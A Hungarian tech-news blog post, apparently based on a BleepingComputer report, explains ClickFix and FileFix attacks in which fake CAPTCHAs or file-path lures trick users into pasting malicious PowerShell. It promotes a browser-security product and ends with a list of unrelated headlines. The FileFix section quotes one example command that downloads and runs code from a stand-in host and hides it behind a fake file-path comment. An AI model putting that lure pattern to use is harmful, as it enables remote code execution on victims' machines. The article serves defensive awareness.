2025. 08. 06., 09:14

Veszély a böngészőből: így trükköznek a ClickFix és FileFix támadásokkal!

Veszély a böngészőből: így trükköznek a ClickFix és FileFix támadásokkal!
Az utóbbi időszakban különösen veszélyes támadási módszer terjedt el az interneten, amelynek lényege, hogy ártalmatlannak tűnő weboldalakon keresztül vehetik rá a felhasználókat arra, hogy saját maguk futtassanak le káros kódokat a számítógépükön. Az átverés neve ClickFix, és az egészben az a legveszélyesebb, hogy a felhasználó szinte semmit sem vesz észre, miközben maga segíti hozzá a támadót a rendszer feltöréséhez.

Így működik a ClickFix: átverés egy kattintással

A ClickFix támadásoknál a támadók megtévesztő weboldalt hoznak létre, gyakran például hamis CAPTCHA-ellenőrzéssel. Ha valaki rákattint egy ilyen, látszólag problémát megoldani hivatott elemre, a weboldal észrevétlenül másol rosszindulatú kódot a felhasználó vágólapjára. Ezután felszólítják a felhasználót, hogy igazolja magát – tipikusan úgy, hogy a vágólap tartalmát illessze be a Windows Futtatás ablakába.

Lényeges, hogy a megtévesztett felhasználó ebben a pillanatban maga hajtja végre a támadók kódját a saját gépén, abban a hitben, hogy csak egy, az emberi mivoltát igazoló tesztet erősít meg. Ezzel a trükkel a támadók anélkül tudnak támadni, hogy bármilyen vírus áthágná az operációs rendszer védelmi vonalait – minden az emberi tényezőn múlik.

Valós példa: kattintás egy találatra, kártékony PowerShell a vágólapon

Egy valós céges példában az egyik felhasználó egy keresési találatot követve olyan oldalra tévedt, ahol a támadók már elhelyezték a káros JavaScript kódot. A clickfixes prompt felugrott, és ha nem lett volna aktív a Keep Aware böngészővédelmi rendszer, a felhasználó észrevétlenül másolta volna át a kártékony PowerShell-parancsot, majd futtatta volna azt.

Ezzel szemben a Keep Aware valós időben észlelte, blokkolta, és figyelmeztetett a gyanús kódfeltöltésre, így megelőzte a további fertőzést. Ha nem lép közbe a védelmi rendszer, a támadás a háttérben úgy zajlott volna le, hogy néhány fájlt letölt, lefordítja a kódot, beállítja a fenyegetést a Windows automatikus futtatásához – így minden bejelentkezéskor újraindul a kártevő.

Az ilyen trükkök célja általában káros programok telepítése: például távoli elérésű trójai (RAT), adatszivárogtató programok, illetve további kártevők – például NetSupport Manager, AsyncRAT, Skuld Stealer, Lumma Stealer, DarkGate kártevő vagy DanaBot stealer.

A következő szint: FileFix – már a fájlkezelő is veszélyes

A támadók azonban nem ülnek a babérjaikon; a ClickFix mellett megjelent a FileFix nevű „új generáció”, amelyet biztonsági kutatók idén júniusban fedeztek fel. A FileFix lényege, hogy a felhasználót ráveszi: egy, fájlútvonalnak látszó, de valójában PowerShell-parancsot tartalmazó sort illesszen be közvetlenül a Windows Fájlkezelő címsorába.

A trükk annyira jól álcázott, hogy első pillantásra teljesen ártatlan útvonalnak tűnik – például:
powershell.exe -c “iwr káros[.]webhely/mal.jpg|iex” # C:CégBelsőDrivePályázat.pdf
A komment mögé rejtett fájlútvonal eltereli a figyelmet, miközben a valós fenyegetés (a letöltött kártevő) már a háttérben aktiválódik.

Fontos, hogy a FileFix ugyanarra az elvre épül, mint a ClickFix: mindkettő a vágólap manipulálásához és ahhoz kéri a felhasználó segítségét, hogy maga hajtsa végre a futtatáshoz szükséges parancsokat a saját gépén. A fő különbség, hogy a FileFix a böngészőből átterjed a fájlkezelőre is.


A védekezés leghatékonyabb módja: böngészőalapú védelem

Ennek fényében világos, hogy a hagyományos vírusirtók és klasszikus IT-védelem gyakran vak a vágólap manipulációjára és a böngészőben megbúvó fenyegetésekre. Az ilyen támadások elleni védelem kulcsa, hogy már a böngészőben felismerjük a csalafinta vágólap-módosításokat, felhasználói interakciókat, és időben blokkoljuk a rossz szándékot.

A Keep Aware és más, böngészőbe épülő, valós idejű védelmi rendszerek képesek azonnal érzékelni a vágólap gyanús feltöltését, blokkolják a kódot, mielőtt az eljuthatna a Windows termináljáig vagy a Fájlkezelőhöz.

Fontos kiemelni, hogy napjaink munkavégzésének nagy része böngészőben történik – és a támadók pontosan ezt használják ki. Aki nem biztosítja megfelelően böngészőjét, az valójában az egész rendszerét kockára teszi.

Mi a tanulság?

A ClickFix és FileFix támadások megjelenése új szintre emelte a social engineering támadásokat: már nemcsak gyanús csatolmányokat kell kerülni, hanem szinte bármilyen weboldaltól, ártalmatlan felugró ablaktól vagy másolásra buzdító üzenettől is óvatosnak kell lenni. Lényeges, hogy a védelem nem csak az antivírusokon, hanem a böngésző belső szabályain és a felhasználói tudatosságon is múlik. Felhasználók és rendszergazdák számára egyszerű szabály: soha ne illesszen be, és ne futtasson le ismeretlen eredetű parancsokat – még akkor sem, ha az egy CAPTCHA-t vagy fájlútvonalat imitál.

2025, adminboss, www.bleepingcomputer.com alapján

  • Mit gondolsz, mennyire lehet megbízni egy ismeretlen weboldal üzenetében?
  • Te mit tettél volna, ha ilyen gyanús üzenetet kapsz, amit nem értesz teljesen?
  • Szerinted mennyire lehet etikus, ha a támadók ilyen trükkös módon próbálják meg átvágni az embereket?


Legfrissebb posztok

hétfő 21:56

Az MI-szuperszámítógép lehet a brit fúziós áttörés kulcsa

⚡ Minden eddiginél nagyobb teljesítményű, MI-alapú szuperszámítógép épül nyáron az oxfordshire-i Culham kutatóközpontban, amely a remények szerint lendületet adhat a brit fúziósenergia-fejlesztésnek...

hétfő 21:45

Az iráni háború felforgatja az olajpiacot – Meddig bírják a gazdaságok?

Fontos kérdés, mennyire tud ellenállni a világgazdaság az olajválságnak, amelyet az iráni háború indított el...

hétfő 21:34

Az amerikai partoknál már pörögnek az új szélerőművek

Az Egyesült Államok keleti partvidékén két új offshore szélfarm is elindult, amelyek jelentősen növelik a régió zöldenergia-ellátását...

hétfő 21:23

A Wing FTP kritikus hibája az állami szervereket fenyegeti

⚠ Az Egyesült Államok kormányzati ügynökségeit sürgősen figyelmeztették, hogy a Wing FTP Server szoftverükben lévő veszélyes sérülékenységet mielőbb javítsák, mivel hackerek már aktívan kihasználják...

hétfő 21:12

A techóriások összefognak: végre együtt csapnak le az online csalókra

A Google, a Microsoft, a LinkedIn, a Meta, az Amazon, az OpenAI, az Adobe és a Match Group most közös frontot alkotnak az online átverők ellen...

hétfő 21:02

Az áttörés: szívgyógyító injekció egereknél és sertéseknél

Egyetlen speciális injekció heteken át képes beindítani a szívizom öngyógyítását – legalábbis egerekben és disznókban...

hétfő 20:56

Az új AirPods Max 2: még jobb zajszűrés, okosabb extrák

🎧 A kaliforniai Apple bemutatta az AirPods Max 2-t, amely jól ismert, fület körülölelő formáját most még jobb aktív zajszűréssel, magasabb hangminőséggel és intelligens újításokkal ötvözi...

hétfő 20:45

Az új Google TV-frissítés véget vet a reklámmentes élménynek?

📺 A Google TV újabb frissítése kisebb fennforgást okozott azok körében, akik szeretik testreszabni az okostévéjük felületét...

hétfő 20:34

Az MI áttörése: Itt a bizonyítások automatizálásának kora?

A matematika világa épp most forradalmasodik: ahogy a mesterséges intelligencia egyre gyorsabban fejlődik, a matematikusok is egyre nehezebben látják előre, milyen szerepük marad a jövőben...

hétfő 20:25

A Yahoo feltámadása: visszatér a web régi kedvence

A Yahoo az elmúlt évtizedek egyik legnagyobb hullámvasútját járta be az internet világában: fénykorából, amikor még az egész világhálót segített feltérképezni, az elhúzódó válságig és a Verizon nevű mobilóriás keblébe olvadásáig sok mindenen keresztülment...

hétfő 20:12

Az unalmas stabilcoin-részvény, amely tarol a kriptopiacon

Habár a stabilcoinokat általában a kriptovilág szürke eminenciásainak tartják, most mégis a Circle részvénye tarol: egyetlen hónap alatt több mint 100%-kal emelkedett az árfolyama...

hétfő 19:45

Az OpenAI kacérkodik az erotikával, de a pornótól hátrál

😉 Mostantól lehet majd pajzánul beszélgetni a ChatGPT-vel, de ne számíts 18+-os képekre, hangokra vagy videókra...

hétfő 19:34

Az xAI újraindul: megbotlott Musk egója a siker küszöbén?

Elon Musk alig egy hónappal azután, hogy alapította saját MI-startupját, az xAI-t, máris teljes átszervezésbe kezdett...

hétfő 19:24

A százéves rejtély: hová tűnt Nell, az első folyékony hajtóanyagú rakéta?

🚀 1926. március 16-án egy jeges mezőn emelkedett a magasba Robert Goddard úttörő rakétája, amely elsőként használt folyékony hajtóanyagot...

hétfő 17:56

A szék, ami végre megoldja a félig hordott ruhák gondját

👖 Felmerül a kérdés, mit kezdjen az ember azokkal a ruhákkal, amelyeket már egyszer felvett, de még nem kell kimosni – a padlón való gyűjtésük helyett most felbukkant egy kreatív megoldás...

hétfő 17:46

A Legyőzhetetlen 4. évada végre berúgja az ajtót

🔥 A világ sorsa forog kockán, amikor elindul a Legyőzhetetlen negyedik évada – Mark Grayson pedig kénytelen végezni egy ártatlan emberrel...

hétfő 17:23

A jó szándék kevés: az akadálymentesség rejtett csapdái

👁 A digitális világban ma már mindenki hallott arról, mennyire fontos a weboldalak akadálymentessége, mégis a gyakorlatban gyakran hatalmas szakadék tátong a tudatosság és a megvalósítás között...

hétfő 17:12

A tiltott elmélet, amely átírná a kvantummechanikát

⚠ Már több mint száz éve, hogy a kvantummechanika forradalmasította a fizikát...

hétfő 17:03

A Wi‑Fi 7 száguld, de alig akad, aki kihasználja

Sokan nem tekintik sürgős feladatnak a router cseréjét, pedig lehet, hogy ezzel jól járnának – főleg azok, akik gyakran küzdenek szakadozó, instabil internettel...

hétfő 16:56

Az árnyékban burjánzó MI: súlyos következményei lehetnek, ha nem figyelsz

🕴 A vállalatoknál egyre több digitális eszköz és alkalmazás épül be a mindennapi működésbe, így ma már szinte minden dolgozó használ valamilyen MI-alapú megoldást...

hétfő 16:45

Az óceán elveszett hangja: előkerült a valaha rögzített első bálnadal

Egy különleges, 1949-ben rögzített bálnadal került elő, amely minden eddiginél mélyebb bepillantást enged ezeknek az óriási állatoknak a kommunikációjába...

hétfő 16:24

Az új Bitcoin-láz: már a 75 ezer dollárt ostromolja

A hét elején újabb lendületet kapott a kriptopiac: a bitcoin árfolyama újra megközelítette a 75 000 dolláros (kb...

hétfő 14:03

Az iPhone-od lesz a jogosítványod? Itt a nagy áttörés!

Például reggel elindulsz dolgozni, az iPhone-od a zsebedben, de otthon hagyhatod a vastag pénztárcádat – már a jogosítványodat sem kell vinned...

hétfő 13:56

A Google most letiltotta az egyik legnépszerűbb Chrome-bővítményt

🚫 Érdekes fejlemény, hogy a Save as Image Type bővítmény, amely sokaknak megkönnyítette a képek mentését különböző formátumokban, váratlanul eltűnt a Chrome-ból...

hétfő 13:45

Az amerikai tőzsdefelügyelet elállt a BitClout-alapító elleni pertől

A New York-i déli kerületi szövetségi bíróságon március 12-én végleg lezárták az amerikai tőzsdefelügyelet (SEC) polgári eljárását, amelyben Nader Al-Najit, a BitClout és a DeSo blokkláncplatformok létrehozóját vádolták meg...

hétfő 13:35

Az atomi frusztráció forradalmasíthatja a kvantumfizikát

⚡ A Kaliforniai Egyetem kutatói egy egészen különleges kvantumállapot létrejöttére bukkantak, amikor egy kristály atomi szerkezetében kétféle, egymással versengő frusztráció – mágneses és kötési – egyidejűleg jelenik meg...

hétfő 13:23

Az új csodadallam tényleg 24 perc alatt elűzi a szorongást?

🎵 Egy friss klinikai vizsgálat szerint már 24 percnyi, speciálisan megtervezett zenehallgatás is jelentősen enyhítheti a szorongás tüneteit...

hétfő 12:04

Az elavult rendszerektől a Cloudflare One-ig: Leáldozott az egylépéses átállások korának

A hálózati rendszermérnökök számára kevés dolog stresszesebb, mint amikor egy hétvége alatt kell átalakítani egy teljes infrastruktúrát, különösen, ha ez egy 30 ezres cégnél, több mint 1000 elavult alkalmazás új rendszerre való átkapcsolását jelenti...

hétfő 11:56

A káosznak vége: mobilon is rendezheted Spotify-listáidat

📷 Egy lényeges újdonság, hogy a Spotify mobilos alkalmazása hamarosan olyan funkcióval bővülhet, amelyre a felhasználók már 15 éve várnak: a lejátszási listák mappáinak kezelése közvetlenül telefonról is elérhető lesz...